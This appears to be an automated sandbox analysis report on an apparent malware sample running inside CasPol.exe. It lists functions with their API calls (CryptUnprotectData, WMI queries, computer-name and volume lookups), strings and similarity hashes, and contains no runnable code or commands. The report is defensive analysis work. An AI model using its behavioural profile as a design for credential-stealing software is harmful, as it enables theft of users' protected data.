String ID: Book is not available: $Checked out:
API String ID: 2302506090-4164626871
Opcode ID: a258169edd959f98fccfe3a7d28f38c69cd290be51da500423fb93a6ba4c0086
Instruction ID: f32136f1e01836bd1a04cddd12aef366b15a74429157053ea0ba1e23a51f8bbd
Opcode Fuzzy Hash: a258169edd959f98fccfe3a7d28f38c69cd290be51da500423fb93a6ba4c0086
Instruction Fuzzy Hash: 1111273150C3428EDB10DE28D485BEABBE49FA7318F944219ECE1572A1D630DE89E391

Function 00CA204B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00CA2050
?_Xlength_error@std@@YAXPBD@Z.MSVCP140(list too long,?,?,?,?,00B41EAB,00000320), ref: 00CA206B

Strings

list too long, xrefs: 00CA2066

Memory Dump Source

Source File: 00000000.00000002.2452759733.0000000000B41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000000.00000002.2452723159.0000000000B40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452943927.0000000000CAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452967756.0000000000CAD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453024217.0000000000CB2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453050953.0000000000CB3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_BigProject.jbxd

Similarity

API ID: H_prologXlength_error@std@@
String ID: list too long
API String ID: 1660897028-1124181908
Opcode ID: 167db8f72181f7b91ca429edb92374d2ff8694ac5e24fa468ca782a2e2c70e25
Instruction ID: 9496ce07afbf5665ed8d19085122c2835b60e1ecf679d532ad0ef2a7fdabc8b8
Opcode Fuzzy Hash: 167db8f72181f7b91ca429edb92374d2ff8694ac5e24fa468ca782a2e2c70e25
Instruction Fuzzy Hash: D3F0A9B5A00601DFC318CF58D404B69FBF4FF8A729F10816EE41A97391D7B0A900CBA0

Function 00CA2D4F Relevance: 5.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,00000000,?), ref: 00CA2DB2
memcpy.VCRUNTIME140(00000000,?,?,00000000,00000000,?), ref: 00CA2DBD
memcpy.VCRUNTIME140(00000000,?,?), ref: 00CA2DDB
memcpy.VCRUNTIME140(00000000,?,?,00000000,?,?), ref: 00CA2DE6

Memory Dump Source

Source File: 00000000.00000002.2452759733.0000000000B41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000000.00000002.2452723159.0000000000B40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452943927.0000000000CAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452967756.0000000000CAD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453024217.0000000000CB2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453050953.0000000000CB3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_BigProject.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 155595a6eb0dae2662590eb88d9bcc43fb1d05a3c682b0a56f855948e4927502
Instruction ID: 4decec52aeba0eeacf018d4c9bfb20f054a4d2d7dbc270fd723a0f3278c49185
Opcode Fuzzy Hash: 155595a6eb0dae2662590eb88d9bcc43fb1d05a3c682b0a56f855948e4927502
Instruction Fuzzy Hash: 1421C371508312AFC704EF2CC88096FBBE9EF8A304F104A5DF450DB242DB71E90597A2

Analysis Process: CasPol.exePID: 7404, Parent PID: 6008COMMON

Execution Graph

Execution Coverage:	8.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	38.4%
Total number of Nodes:	318
Total number of Limit Nodes:	9

Executed Functions

Function 00437DF0 Relevance: 28.6, APIs: 11, Strings: 5, Instructions: 640
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00438034
SysAllocString.OLEAUT32()\"^), ref: 004380C3
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438101
SysAllocString.OLEAUT32()\"^), ref: 0043817E
SysAllocString.OLEAUT32()\"^), ref: 00438238
VariantInit.OLEAUT32(C7C6C5CC), ref: 004382A8
VariantClear.OLEAUT32(?), ref: 004383F9
SysFreeString.OLEAUT32(?), ref: 0043841D
SysFreeString.OLEAUT32(?), ref: 00438423
SysFreeString.OLEAUT32(00000000), ref: 00438430
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,66966446,00000000,00000000,00000000,00000000), ref: 00438468

Strings

)\"^, xrefs: 004380BE, 004380C2, 0043817D, 00438237, 0043845B
pq, xrefs: 004382E2
P%R, xrefs: 0043804A
O@, xrefs: 0043806A
.H4J, xrefs: 0043805A

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
String ID: P%R$)\"^$.H4J$O@$pq
API String ID: 2573436264-1397720406
Opcode ID: cd14e05d7432ded1bf926f32cda1f224496113c88b4519bc978cba4cd539789a
Instruction ID: 8d1c6a9ba2bf63fa8fe487279597ba15b590cfaf954231a8494ef46f424a72d4
Opcode Fuzzy Hash: cd14e05d7432ded1bf926f32cda1f224496113c88b4519bc978cba4cd539789a
Instruction Fuzzy Hash: D022EFB2A483418BD314CF25C880B5BBBE5EFC9704F148A2DF5919B381E779D909CB96

Function 00423860 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 501
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

WE, xrefs: 00423D04
OU, xrefs: 00423CFC
{\}, xrefs: 00423E3E
A[, xrefs: 00423D14
Fg)i, xrefs: 00423E56
7N1@, xrefs: 00423ED0, 00423EE1
/G$I, xrefs: 00423E16

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID: /G$I$7N1@$A[$Fg)i$OU$WE${\}
API String ID: 0-1763234448
Opcode ID: 99fe5afda1dcc440005955b3418fa216d89817fb1a5d97e426eeaa65bb2ccc37
Instruction ID: 056ee81575811c50f3dd50ebd9ce003cf240713406730f881528123b83eb6744
Opcode Fuzzy Hash: 99fe5afda1dcc440005955b3418fa216d89817fb1a5d97e426eeaa65bb2ccc37
Instruction Fuzzy Hash: 2AF1CAB56083509FD3108F65E88276BBBF2FBD2345F54892DF0858B390D7B88906CB86

Function 00415799 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 492
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00415BAF

Strings

NDNK, xrefs: 00415D85
<I2K, xrefs: 00415C2B
X, xrefs: 00415DD2
RXA, xrefs: 00415842
~, xrefs: 0041596E
oA&C, xrefs: 00415CE6
8MNO, xrefs: 00415C36

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: CryptDataUnprotect
String ID: 8MNO$<I2K$NDNK$RXA$X$oA&C$~
API String ID: 834300711-3328159043
Opcode ID: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
Instruction ID: b39a018424f603aff0b8ca9a117b68807cb953dc34c5f22e55a732b949ac1150
Opcode Fuzzy Hash: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
Instruction Fuzzy Hash: 90F125B6608740CFC720CF29D8817EBB7E1AFD5314F194A2EE4D997251EB389845CB86

Function 00409580 Relevance: 9.2, Strings: 7, Instructions: 442
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

+8=>, xrefs: 00409782
#4<7, xrefs: 00409772
\, xrefs: 0040978A
PK, xrefs: 004099E1
Tiec, xrefs: 00409963
r, xrefs: 004095F4
A40A0A1480723A5EAC8923850305D13E, xrefs: 00409642

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID: #4<7$+8=>$A40A0A1480723A5EAC8923850305D13E$PK$Tiec$\$r
API String ID: 0-3458074238
Opcode ID: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
Instruction ID: 6053270823643479f5a9008bd7dab94ee1cb24749ea6a1c2bb59c6b2eb0b3cac
Opcode Fuzzy Hash: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
Instruction Fuzzy Hash: 29D12476A087409BD318CF35C85166BBBE2EBD1318F18893DE5E69B391D738C905CB46

Function 00408850 Relevance: 7.7, APIs: 5, Instructions: 194
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 0040891C
GetCurrentThreadId.KERNEL32 ref: 00408925
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004089DB
GetForegroundWindow.USER32 ref: 00408A33

Part of subcall function 0040C550: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563

Part of subcall function 0040B390: FreeLibrary.KERNEL32(00408AB8), ref: 0040B396
Part of subcall function 0040B390: FreeLibrary.KERNEL32 ref: 0040B3B7

ExitProcess.KERNEL32 ref: 00408AD1

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
String ID:
API String ID: 3072701918-0
Opcode ID: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
Instruction ID: 4e8ceca9db94e69365d2c2d7f1aefafb9de861df3649afd20bfce81a3928f3be
Opcode Fuzzy Hash: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
Instruction Fuzzy Hash: 9351A9BBF102180BD71CAEAACD463A675878BC5710F1F813E5985EB7D6EDB88C0142C9

Function 0042DA53 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 440
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042DA87
GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042DB5D

Strings

0K), xrefs: 0042DF19
4*VP, xrefs: 0042DF24

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: ComputerName
String ID: 0K)$4*VP
API String ID: 3545744682-3626284114
Opcode ID: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
Instruction ID: 79d6e082e0491a4045e5b840a95bb4df230d34c241beba690eb3c8ed7007ce5a
Opcode Fuzzy Hash: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
Instruction Fuzzy Hash: 8FD12730A1C3D08ED7258F3994507ABBFE19FA7314F59896ED4C98B382C7798406CB66

Function 0043C1F0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0043C767 Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

,+*), xrefs: 0043C790

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID: ,+*)
API String ID: 0-3529585375
Opcode ID: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
Instruction ID: 95b520c28a51d7a8debe208fb8c6725e065a55489a7142fefcc330b3f2274472
Opcode Fuzzy Hash: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
Instruction Fuzzy Hash: 7331A539B402119BEB18CF58CCD1BBEB7B2BB49301F249129D501B7390CB75AD018B58

Function 0040B70C Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

o`, xrefs: 0040B74B

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID: o`
API String ID: 0-3993896143
Opcode ID: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
Instruction ID: 0bdba0f6bf2b5cd18ae264ba298f37260da84434396a298b3053f459174327b1
Opcode Fuzzy Hash: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
Instruction Fuzzy Hash: 9C11C270218340AFC310DF65DDC1B6BBFE2DBC2204F65983DE185A72A1C675E9499719

Function 0043ECA0 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7757ad35b4d3f19014e5b0218f9aa537273a9f10abc5234e4bd6fc32e4c2e1b2
Instruction ID: cf6a0fb400f3c0121e69896af41eb3d2a2b4280c5d577effd33442f2baf9bc8c
Opcode Fuzzy Hash: 7757ad35b4d3f19014e5b0218f9aa537273a9f10abc5234e4bd6fc32e4c2e1b2
Instruction Fuzzy Hash: CB81AE326053019BC7249F29C85067FB3A2FFC8710F2AD42DE9868B395EB349C52D785

Function 00433CDF Relevance: 3.0, APIs: 2, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 00433D17
GetSystemMetrics.USER32 ref: 00433D26

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 5f2d3bb2bc73d9fb24c3e71e22e052d5e824def969419b7e1f909697d2eb3c0f
Instruction ID: cb1e3e37586d9a4509bd606a09fc72fdf1ec5b4aeb0744265bd1e649f6a723a7
Opcode Fuzzy Hash: 5f2d3bb2bc73d9fb24c3e71e22e052d5e824def969419b7e1f909697d2eb3c0f
Instruction Fuzzy Hash: 2211AFF4D142188FDB40EF7CD98569DBBF4AB49304F10442AE498E7360E774A9988F86

Function 0042E4A9 Relevance: 1.6, APIs: 1, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 0042E5D8

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: d676d3cf378bce22c63fcc0d702ca03e1329d21923194e356a21209e6313a188
Instruction ID: bada183498579cd0d1e1b9560e2ec57dcdd73a114042e6aef25e130bccfe5e33
Opcode Fuzzy Hash: d676d3cf378bce22c63fcc0d702ca03e1329d21923194e356a21209e6313a188
Instruction Fuzzy Hash: C721297251C39089D735CB368810BEBBBE29FD6308F49CCADC4C847242E7794585C79A

Function 00436145 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 00436165

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: c20870ad1c2550df031d9ae96be031c5a683c54f8c490753efcc1857bb42eeb8
Instruction ID: 741c48333e69648009e785c6466c575ff7d71c05fd411e4f0ced63eefbf4b49a
Opcode Fuzzy Hash: c20870ad1c2550df031d9ae96be031c5a683c54f8c490753efcc1857bb42eeb8
Instruction Fuzzy Hash: 86115B32D052968FDB14CB3C8C502ADBFB15F8A320F1983EDD8A5A33D5D9304E428B51

Function 0043C2C8 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0043CCAF

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
Instruction ID: 8fb46afbfb550afb85baefcd5c24b2e1a72551ea741637eac68a3138d718cba2
Opcode Fuzzy Hash: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
Instruction Fuzzy Hash: 07F04CBAD005408BDB044B75CC821A67BA2DB5F320B18897DD441E3384C63C5807CB5D

Function 0043C180 Relevance: 1.5, APIs: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,00000000,?,?,0040B2E4,00000000,00000001), ref: 0043C1B2

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d479befdbac128fe149772a9185de956813756a2e3e272a70dac7c9e8d919251
Instruction ID: ec0cbf63999808cd9fde2cf832404b9ab0848eb4eaaead86bc709d6aa026588d
Opcode Fuzzy Hash: d479befdbac128fe149772a9185de956813756a2e3e272a70dac7c9e8d919251
Instruction Fuzzy Hash: 59F0E977808211EBD2003F257C01A5736649F8F735F01587AFC0152112D739D422E6AF

Function 0043169A Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 004316E1

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 398b2808b458341c98a87bf67e0231988ff1e1ff89b83f4d85f076abaf8bf248
Instruction ID: 88ab58616cf1dac6cba617d780c76543ffdeb80aa514c7c7d0db7b6f6353d972
Opcode Fuzzy Hash: 398b2808b458341c98a87bf67e0231988ff1e1ff89b83f4d85f076abaf8bf248
Instruction Fuzzy Hash: 0FF09EB8509342CFD394DF64C5A875BBBE0EB89348F01891CE4998B391DBB59548CF82

Function 00430469 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 004304AC

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: c776e90b0c9c6af7e86a6e6b759a0e1348666aeaad21731c063a5846b902e991
Instruction ID: d25a5440729caa6a4a41176679ca809818bf9cac461bb09e9bc77660d505e8e6
Opcode Fuzzy Hash: c776e90b0c9c6af7e86a6e6b759a0e1348666aeaad21731c063a5846b902e991
Instruction Fuzzy Hash: 56F0D4B45093019FD314DF29D16871ABBF4FB88304F01991CE49ACB790C7B5AA48CF82

Function 0040C550 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
Instruction ID: e03bcfaf696d6c281ff3d22d3b8d0c31e3889364fa9117d67ae1079de8c3c82d
Opcode Fuzzy Hash: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
Instruction Fuzzy Hash: 43D0A7B557050867D2086B1DDC4BF22772C8B83B66F50423DF2A7C61D1D9506A14CA79

Function 0040C583 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C595

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
Instruction ID: 58e2b5502705141ff0d3aa7c975cc0701997441b8ab7d7d43dac110591522243
Opcode Fuzzy Hash: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
Instruction Fuzzy Hash: F1D0C9B47D83407AF5749B08AC17F143210A702F56F740228B363FE2E0C9E172018A0C

Function 0043AAA0 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,0043C1D6,?,0040B2E4,00000000,00000001), ref: 0043AABE

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
Instruction ID: 16971ee2c2e030bf17817a0d81dc477e65560ccac1e7abaabcdfe7fdc6775186
Opcode Fuzzy Hash: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
Instruction Fuzzy Hash: B2D01231505522EBC6102F25FC06B863A58EF0E761F0748B1B4006B071C765ECA186D8

Function 0043AA80 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,0043C1C0), ref: 0043AA90

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
Instruction ID: 72b53a506d10aa35cab301047588232e26feb19e762ad2a100d4e8a4b6eb39e1
Opcode Fuzzy Hash: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
Instruction Fuzzy Hash: D6C09231445220BBCA143B16FC09FCA3F68EF4D762F0244A6F514670B2CB61BCA2CAD8

Non-executed Functions

Function 00426B50 Relevance: 30.2, APIs: 1, Strings: 16, Instructions: 439COMMON

Download Yara Rule

Strings

EG, xrefs: 0042740B
+K!M, xrefs: 00427356
NO, xrefs: 00427361
;[0], xrefs: 0042732A
bweM, xrefs: 004276F0
g#X%, xrefs: 004272E8
$&, xrefs: 004275AF
{7y9, xrefs: 004272C7
w?n!, xrefs: 004272DD
FOEH, xrefs: 0042771E
>C7E, xrefs: 00427340
UGBY, xrefs: 00427708
l+X-, xrefs: 004272FE
U'g), xrefs: 004272F3
*W.Y, xrefs: 0042731F
!, xrefs: 00427452

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID: !$*W.Y$+K!M$;[0]$>C7E$FOEH$NO$U'g)$UGBY$bweM$g#X%$l+X-$w?n!${7y9$$&$EG
API String ID: 0-3492884535
Opcode ID: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
Instruction ID: ba39798a3fcb6da663dd5afd8d89a9a5fc3f4f782173f0556435d4ff5b4d5338
Opcode Fuzzy Hash: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
Instruction Fuzzy Hash: A3E10EB4608350CFD7249F25E85176FBBF2FB86304F45896DE5D88B252D7388906CB4A

Function 0041CB40 Relevance: 10.7, Strings: 8, Instructions: 658COMMON

Download Yara Rule

Strings

Q, xrefs: 0041CF39
0u4w, xrefs: 0041D236
p8`;, xrefs: 0041CDBD
SV, xrefs: 0041CF29
xy, xrefs: 0041D23E
qr, xrefs: 0041D063
_q, xrefs: 0041D1C5
KT, xrefs: 0041CF31

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID: 0u4w$KT$Q$SV$_q$p8`;$qr$xy
API String ID: 0-1826372655
Opcode ID: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
Instruction ID: 8fe2ea29b4499c84cffcf606e05d59b8c59937f8b413fb95e2f4cb334fca5623
Opcode Fuzzy Hash: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
Instruction Fuzzy Hash: C92212B690C3109BD304DF59D8816ABB7E2EFD5314F09892DE8C98B351E739C905CB8A

Function 00419F30 Relevance: 10.4, APIs: 2, Strings: 3, Instructions: 1664COMMON

Download Yara Rule

APIs

Part of subcall function 0043C1F0: LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E

FreeLibrary.KERNEL32(?), ref: 0041A6BD
FreeLibrary.KERNEL32(?), ref: 0041A77B

Strings

46, xrefs: 0041A3EA
/,-, xrefs: 0041A991
/ , xrefs: 0041A402

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: / $/,-$46
API String ID: 764372645-479303636
Opcode ID: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
Instruction ID: fba97bcbe2fd55ed4e85c885b06b17ae8f82464d9f69d288493d133838553020
Opcode Fuzzy Hash: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
